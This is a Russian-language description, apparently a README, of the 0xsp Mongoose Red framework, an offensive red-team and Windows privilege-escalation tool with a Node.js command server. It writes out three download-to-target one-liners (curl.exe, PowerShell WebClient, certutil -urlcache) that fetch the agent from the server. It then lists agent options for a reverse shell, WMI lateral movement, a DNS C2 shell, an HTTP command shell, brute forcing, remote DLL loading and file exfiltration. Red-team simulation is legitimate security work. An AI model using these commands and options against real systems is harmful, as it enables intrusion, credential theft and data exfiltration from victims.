
Уникальный фреймворк для симуляции кибербезопасности и операций Red Team, аудита Windows на новые уязвимости, неверные конфигурации и атаки повышения привилегий, воспроизводящий тактики и методы продвинутого злоумышленника в сети.
Поддержите проект для непрерывного развития (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)
Текущий релиз 2.2.0
Версия 0xsp mongoose red предоставляется для удовлетворения ваших потребностей во время кибербезопасности симуляции. Используя эту версию, вы сможете провести аудит целевой операционной системы Windows на предмет уязвимостей системы, неправильных конфигураций и атак на повышение привилегий, а также воспроизвести тактики и техники продвинутого противника в сети.
Благодаря поддержке Node.js для веб-приложения API, установка и настройка в сжатые сроки становится намного проще. Агент-сенсор Windows будет взаимодействовать с API приложения для передачи результатов и получения команд в качестве двунаправленной техники.
Агент способен выявлять и обнаруживать эксплойты для Windows с помощью модулей windows update api и exploit database definitions. Новый релиз также обнаружит следующие уязвимости.
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose
cd 0xsp-mongoose/
npm install
node index.js
Учетные данные по умолчанию :
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP
#пример 1
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#пример 2
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#пример 3
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe
-s --получить информацию о службах Windows и установленных драйверах.
-u --получить информацию о пользователях, группах, ролях.
-c --поиск подключенных драйверов для конфиденциальных файлов конфигурации по расширению.
-n --получить сетевую информацию, сетевые интерфейсы, детали подключения.
-w --перечислить доступные для записи каталоги, проверка прав доступа, измененные разрешения.
-i --получить информацию о системе Windows, сессиях, проверка Always Elevated.
-l --поиск любой строки в файле, например: agent.exe -l c:\ password *.config.
-o --указать адрес хоста приложения NodeJS, также можно использовать srvhost
-p --перечислить установленное ПО, запущенные процессы, задачи.
-e --инструмент проверки ядра, поможет найти уязвимости ядра Windows через базы данных инструментов.
-x --пароль для авторизации соединения с приложением NodeJS.
-d --скачать файлы непосредственно на целевой компьютер.
-t --загрузить файлы с целевого компьютера в приложение NodeJS.
-spooler --сканировать один хост или список хостов на возможный CVE-2021-1675 (например, -spooler -srvhost или -spooler -hosts )
-m --запустить все известные типы сканирования вместе.
[!] РАЗДЕЛ ТАКТИКИ RED TEAM
-r --запустить обратную оболочку с указанной учетной записью.
-lr --техника латерального перемещения с использованием WMI (например, -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip )
-nds --обнаружение сети и перечисление общих ресурсов
-dns --установить интерактивную оболочку DNS C2C
-cmd --передача команд через HTTP Shell
-interactive --запуск интерактивного режима (например, загрузка плагинов и т.д.)
-username --аутентификация идентификатора для конкретных модулей атаки.
-password --аутентификация идентификатора для конкретных модулей атаки.
-host --указать удаленный хост для проведения атаки.
-srvhost --установить адрес удаленного хоста приложения NodeJS.
-bf --модуль брутфорса локальных пользователей / пользователей домена
-import --импорт и выполнение DLL-файла локально
-remote --импорт и выполнение DLL-файла с удаленного хоста
https://0xsp.com/security%20dev/0xsp-mongoose-red
обязательно подпишитесь на следующий канал, чтобы получать уведомления о новых руководствах и трюках для 0xsp https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg